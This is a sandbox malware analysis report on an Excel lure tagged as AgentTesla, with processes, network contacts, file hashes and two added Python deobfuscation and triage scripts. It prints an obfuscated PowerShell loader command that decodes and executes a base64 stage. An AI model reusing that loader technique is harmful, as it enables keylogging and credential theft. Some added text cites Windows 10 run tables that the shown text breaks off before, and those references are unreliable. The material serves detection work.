Malware Analysis Report

2024-12-07 14:10

Sample ID 241112-hea2dawlgw
Target DRAFT BL & MBL PO NO ECM1D2403-29.xls
SHA256 0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40
Tags
agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40

Threat Level: Known bad

The file DRAFT BL & MBL PO NO ECM1D2403-29.xls was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

AgentTesla

Process spawned unexpected child process

Agenttesla family

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

AutoIT Executable

Suspicious use of SetThreadContext

UPX packed file

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 06:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 06:38

Reported

2024-11-12 06:41

Platform

win7-20240903-en

Max time kernel

140s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 496 set thread context of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2800 wrote to memory of 2608 (4 events) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2608 wrote to memory of 844 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2428 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 2020 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2608 wrote to memory of 496 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 496 wrote to memory of 2900 (8 events) N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
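The WriteProcessMemory rows above are the most useful part of this report for triage: read as edges, they give the whole execution chain (mshta → case-mangled PowerShell → nested PowerShell, csc.exe and the dropped winnit.exe → RegSvcs.exe). The Python below is an added example, not part of the sandbox report or its tooling: it parses rows in the report's own format (accepting an optional "(N events)" count so repeated rows can be collapsed), rebuilds the process tree, flags the parent/child pairs that this chain exhibits, and catches the non-canonical spelling of powershell.exe that defeats case-sensitive string matching. The edge rules and the canonical-name table are this example's own choices; the sample rows are copied from the behavioral1 and behavioral2 tables on this page.

```python
import re
from collections import Counter

# Added example (not part of the sandbox report). Rows are the behavioral1
# "Suspicious use of WriteProcessMemory" table from this report, in the
# report's row format; "(N events)" is an optional count honoured by the parser.
WRITE_ROWS_B1 = r"""
PID 2800 wrote to memory of 2608 (4 events) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2608 wrote to memory of 844 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2428 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 2020 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2608 wrote to memory of 496 (4 events) N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 496 wrote to memory of 2900 (8 events) N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"""
# behavioral2 (Windows 10) only got as far as Excel writing into mshta.exe;
# the two identical rows are two separate events.
WRITE_ROWS_B2 = r"""
PID 768 wrote to memory of 3940 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 768 wrote to memory of 3940 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
"""

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+)(?: \((\d+) events?\))? \S+ (.*)$")
PATH_SPLIT = re.compile(r" (?=[A-Za-z]:\\)")  # a space that starts a new drive path

# Canonical on-disk spellings (this example's table). A mangled spelling such as
# powERsHeLl.eXe is an evasion against case-sensitive string matches.
CANONICAL = {"powershell.exe": "powershell.exe", "mshta.exe": "mshta.exe",
             "regsvcs.exe": "RegSvcs.exe", "csc.exe": "csc.exe"}

# (source image regex, target image regex, reason); matched on lowercased paths.
SUSPICIOUS_EDGES = [
    (r"\\excel\.exe$", r"\\mshta\.exe$", "Office application created mshta.exe (script host)"),
    (r"\\mshta\.exe$", r"\\powershell\.exe$", "mshta.exe created PowerShell"),
    (r"\\powershell\.exe$", r"\\csc\.exe$", "PowerShell invoked the C# compiler (runtime compilation)"),
    (r"\\powershell\.exe$", r"\\appdata\\.*\.exe$", "PowerShell launched an executable under the user's AppData"),
    (r"\\appdata\\.*\.exe$", r"\\microsoft\.net\\framework\\.*\.exe$",
     "AppData executable wrote into a .NET framework binary (hollowing candidate)"),
]


def parse_rows(text):
    """Return (edges, images): edges maps (src_pid, dst_pid) -> event count,
    images maps pid -> image path."""
    edges, images = Counter(), {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        count = int(m.group(3)) if m.group(3) else 1
        src_img, dst_img = PATH_SPLIT.split(m.group(4))
        edges[(src, dst)] += count
        images[src], images[dst] = src_img, dst_img
    return edges, images


def render_tree(edges, images):
    """Indented process tree; roots are pids that nobody wrote into."""
    children = {}
    for src, dst in edges:
        children.setdefault(src, []).append(dst)
    written_into = {dst for _, dst in edges}
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {images[pid]}")
        for child in sorted(children.get(pid, [])):
            walk(child, depth + 1)

    for root in sorted(p for p in images if p not in written_into):
        walk(root, 0)
    return lines


def analyze(text):
    edges, images = parse_rows(text)
    findings = []
    for (src, dst), n in sorted(edges.items()):
        s, d = images[src].lower(), images[dst].lower()
        for src_re, dst_re, why in SUSPICIOUS_EDGES:
            if re.search(src_re, s) and re.search(dst_re, d):
                findings.append(f"{src}->{dst} x{n}: {why}")
    for pid, img in images.items():
        name = img.rsplit("\\", 1)[-1]
        canon = CANONICAL.get(name.lower())
        if canon and name != canon:
            findings.append(f"{pid}: non-canonical image spelling {name!r} (expected {canon!r})")
    return {"tree": render_tree(edges, images), "findings": findings}


if __name__ == "__main__":
    for label, rows in (("behavioral1", WRITE_ROWS_B1), ("behavioral2", WRITE_ROWS_B2)):
        result = analyze(rows)
        print(label, *result["tree"], *result["findings"], sep="\n  ")
```

In behavioral1 the tree is rooted at mshta.exe rather than Excel because the report records no write from EXCEL.EXE (PID 2384) into it: mshta was started as a COM server (`-Embedding`), which is why the Windows 10 run surfaces the Excel → mshta relationship through the "unexpected child process" signature instead. Any rule set like this one should match on lowercased paths, as the sample's `windowspOWeRsheLl\v1.0\powERsHeLl.eXe` shows.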

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'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'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF70.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF6F.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"
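The powERsHeLl.eXe command line in the list above never contains its real payload as plain text: `[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG(...` assembles `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` from string fragments and `[char]` casts, and the outer `iex($(iEX(...)))` evaluates the assembled text and then runs whatever it decodes. The Python below is an added example, not part of the sandbox report: it folds the concatenation statically (no PowerShell execution), pulls the base64 out of the `FromBase64String` call, decodes it with the encoding the expression names, and normalises the abbreviated switches (`-Ex bypasS`, `-NOp`, `-w 1`, and the `-C DEViCEcReDeNtiALdEpLOYMeNT` token that the report's "Evasion via Device Credential Deployment" signature keys on). The page elides the real base64 blob, so a constructed stand-in string is encoded in its place; the token grammar, switch handling and regexes are this example's own.

```python
import base64
import re

# Added example (not part of the sandbox report). The command line mirrors the
# powERsHeLl.eXe entry in the report, but the base64 blob is elided on the page,
# so a constructed stand-in (STAGE2) is encoded in its place.
STAGE2 = "Write-Host 'stage2 placeholder'"
B64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_CMDLINE = (
    "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; "
    "iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG("
    "[SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'"
    + B64 + "'+[cHaR]0x22+'))')))"
)

# A single-quoted PowerShell literal ('' is an escaped quote) or a [char]N cast
# with N in decimal or 0x-hex. Case-insensitive because the sample randomises case.
TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\](0x[0-9a-f]+|\d+)", re.I)


def innermost_iex_arg(cmd):
    """Return the argument text of the innermost iex( ... ); parentheses inside
    single-quoted literals are ignored when balancing."""
    starts = [m.end() for m in re.finditer(r"\biex\(", cmd, re.I)]
    if not starts:
        return None
    start = i = starts[-1]
    depth, in_str = 1, False
    while i < len(cmd):
        c = cmd[i]
        if c == "'":
            in_str = not in_str
        elif not in_str and c == "(":
            depth += 1
        elif not in_str and c == ")":
            depth -= 1
            if depth == 0:
                return cmd[start:i]
        i += 1
    return None


def fold_concat(expr):
    """Statically resolve 'lit'+[char]58+'lit'... into one string. Only string
    literals and [char] casts are folded; any other operand is dropped."""
    out = []
    for lit, ch in TOKEN.findall(expr):
        if ch:
            out.append(chr(int(ch, 16) if ch.lower().startswith("0x") else int(ch)))
        else:
            out.append(lit.replace("''", "'"))
    return "".join(out)


STAGE_RE = re.compile(
    r'encoding\]::(utf8|unicode|ascii)\.getstring\('
    r'\[system\.convert\]::frombase64string\("([A-Za-z0-9+/=]+)"\)\)', re.I)
CODECS = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}


def decode_stage(expr):
    """Decode [Encoding]::X.GetString([Convert]::FromBase64String("...")) once
    the concatenation has been folded. Returns (encoding_name, text)."""
    m = STAGE_RE.search(expr)
    if not m:
        return None, None
    enc = m.group(1).lower()
    return enc, base64.b64decode(m.group(2)).decode(CODECS[enc])


def parse_switches(cmd):
    """Normalise abbreviated switches before the first ';' (prefix forms only,
    e.g. -Ex, -NOp, -w; '-w 1' is -WindowStyle Hidden)."""
    toks = cmd.split(";", 1)[0].lower().split()
    info = {"exec_policy": None, "no_profile": False,
            "window_hidden": False, "command_stub": None}
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if len(t) >= 3 and "-executionpolicy".startswith(t):
            info["exec_policy"] = nxt
        elif len(t) >= 4 and "-noprofile".startswith(t):
            info["no_profile"] = True
        elif len(t) >= 2 and "-windowstyle".startswith(t):
            info["window_hidden"] = nxt in ("1", "hidden")
        elif len(t) >= 2 and "-command".startswith(t):
            info["command_stub"] = nxt
    return info


def deobfuscate(cmd):
    info = parse_switches(cmd)
    arg = innermost_iex_arg(cmd)
    info["inner_expression"] = fold_concat(arg) if arg else ""
    info["encoding"], info["stage2"] = decode_stage(info["inner_expression"])
    return info


if __name__ == "__main__":
    for key, value in deobfuscate(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Static folding is enough for this sample because the only operands are literals and `[char]` casts; a loader that computes fragments with `-join`, `-replace` or format operators would need a second folding pass or an actual PowerShell run under logging, and the decoded stage2 should be treated as a fresh input, since it is what went on to compile C# and drop winnit.exe in this report.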

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2384-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2384-1-0x000000007223D000-0x0000000072248000-memory.dmp

memory/2800-16-0x0000000002730000-0x0000000002732000-memory.dmp

memory/2384-17-0x0000000003070000-0x0000000003072000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 9d3841d618ec3b8e965084c7d5756dba
SHA1 64e58a9fcaea0c87bd9e2f959b0fb42f0737615e
SHA256 a26872ec2bd5b9a439bbdd2edd834216538f4139850a5bce5b2c3a6ab47bda12
SHA512 bbb824f160a0a0b76a2e3e32d989fb7bf867e5814716c4219b4c012d67dbaf6b487123b584faf26245b7967ecd90ff9801f0688eeb6299a83e3b4226f7128031

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 81132b36583c8271c57dea829ba9e703
SHA1 733155c25e7d1d2de1fd3ccc344687f8e3acf405
SHA256 c53f813e6a53f3e5579a06f2ada1c6829797a20e83b7702d6988de6dd3c19a0e
SHA512 03eaecf39525bbc457de040b82767addf8492ce69642a7a3861d167db441105db5905bfddfa8d61adfd4e00518ed70e929cd1f9fd4ff2c07242694c307c992a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 58c534b3002effb43019949c9e5dbb6f
SHA1 e8a7f39d1cd084872b9b5db4454c0c888408a0f9
SHA256 4fc48ed22e464d082039573a2fc8a44129ce11a72b7c397136482e4488a1ee2c
SHA512 4e03e09710bb4005d3cacaabb78b70b8c48016336b65ec3f1bc5e2726d48f388acbd1a787cf413f724d355e747d2db1a14d3b512bd20f887252cbea470d876ae

C:\Users\Admin\AppData\Local\Temp\CabC745.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\creatingnextleeverthingswithentireprocessgetitinonlineback[1].hta

MD5 e69934eff6238d7a043cf35938fd4ad3
SHA1 de69f4785657104ad260b25c6e09231f566991f1
SHA256 46af3b6280d8707438e4c2f4c8134ddafe46a4c59799b84e55645b384b4aa208
SHA512 c821bd8f363f22f941093588a9f7772a479d930daf190124be13a7f493fe73debb1c535990d9cb5c3982234e3572202a42c95087ea90e0681cc32509e79e722b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 997f1131efac13d28da12bdb0fc2c812
SHA1 a56eaf579a869d87d0dc38286b1485a89fc4647c
SHA256 ef0393f8e70f1f0bc85fa4ede361bbc2cb877282e35407f33b28856087e8c8fc
SHA512 2fccdba72ccba40b057627cbeefcb688c1cf7b97dbbd360a0e6d4f2e1f5f8138120b143d21517e0bdc605550ed12f0ea6516fa7ac54569946d606ae6104b5273

\??\c:\Users\Admin\AppData\Local\Temp\-uxvkgn0.cmdline

MD5 acaf1e5cb7d0ffb09b36d92b9dffd1d8
SHA1 123d4f7f19e16cb7b25e6274b70e8f2c86ce1d8b
SHA256 47cefb853761a36500e30dd109d3b8067dd831fb18b38353a866ccaa50ca1c6c
SHA512 9f9c2d7ed32697ecc8407e0286c0f6f639131ece21a6ead57d815a471dd0aad5c72e9335ac738be31663e96068d99b284e0790f5bb05355271251cbb8ec674e8

\??\c:\Users\Admin\AppData\Local\Temp\-uxvkgn0.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\CSCCF6F.tmp

MD5 fa0ad5eea115ea27401de52140ef599b
SHA1 221a9067a15bb84798f92c30d64235906d5f096d
SHA256 fee485cb7af5b799261b59e8e5dfc6939b57fb8bb1c2800da126f08d5efc6cd6
SHA512 24eb28aeeda30bee0dd58f352ff711c229692170f4ba18b7612c353296e0cb227ab58898298142ee23a38e71e5d8e88c72dc86e20c0a5ba6faecea9b4957ff4f

C:\Users\Admin\AppData\Local\Temp\RESCF70.tmp

MD5 4981dffbc8e39a20df10db3c548f25eb
SHA1 7c6b9a10f0add19eded0e1de724874b831a2abf6
SHA256 73568086024c4395c46ad1f3765e9e5e3c775d7cbc2cd730dc74edcbef123a52
SHA512 ee93d9b16b13d9ac92e99eb7e0b09c3eed0b5463b900ed3769fd606ecfde718f3b44488706f2d85dce8dd7e0b4af9d0694ddc984c4b3de4812700230318f5d6a

C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.dll

MD5 bb25bbf54b2c88e192908b53a55405f7
SHA1 c5d25725f1199705ff5c7aedb8c4830fc773fb10
SHA256 428a5fde6c551ae5bcb106d384d85030310b6b7bb871888c483c6022e4e4561a
SHA512 8f58ebeb79f21bd40118f36eec4339772a5af093caf284038fc77b8858e087896c2c411156336ba0080d818b2c97a72a62f396faf3fee7b3025273a57751a9d2

C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.pdb

MD5 4b9d901fb81da015d135ebfb67106a0b
SHA1 8de2ccf1ba04d13e3bc9a5732e293ba4b72c0db7
SHA256 3d7c85a68d29f1d68b32c8bb51201b4d6c11bac1a411db799a93cf946bef6527
SHA512 e6a1d0e8869d1c60d7a44cf3752c959b6481c731b12dd83dd3d093337a11a40363e5e8d788863cd5ab763a5f4790be585bdd66e16ed78731d6931b6720081ffb

memory/2384-60-0x000000007223D000-0x0000000072248000-memory.dmp

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/2608-65-0x00000000067B0000-0x00000000069BD000-memory.dmp

memory/2900-69-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2900-70-0x0000000000400000-0x0000000000446000-memory.dmp

memory/496-72-0x0000000000D90000-0x0000000000F9D000-memory.dmp

memory/2900-73-0x0000000000960000-0x00000000009B4000-memory.dmp

memory/2900-74-0x0000000002020000-0x0000000002072000-memory.dmp

memory/2900-98-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-108-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-106-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-132-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-128-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-124-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-122-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-120-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-118-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-116-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-114-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-110-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-104-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-102-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-100-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-96-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-94-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-92-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-90-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-86-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-84-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-82-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-80-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-130-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-78-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-126-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-76-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-112-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-75-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-88-0x0000000002020000-0x000000000206D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 06:38

Reported

2024-11-12 06:41

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

140s

Command Line

